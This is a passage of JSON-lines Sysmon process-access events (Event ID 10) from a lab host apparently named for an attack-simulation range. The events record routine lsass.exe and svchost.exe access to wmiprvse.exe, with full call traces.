l+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.935","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.951\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.951","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.951\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.951","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.951\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.951","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.966\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.966","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.966\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.966","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.966\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.966","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-00106E110500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-00106E110500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 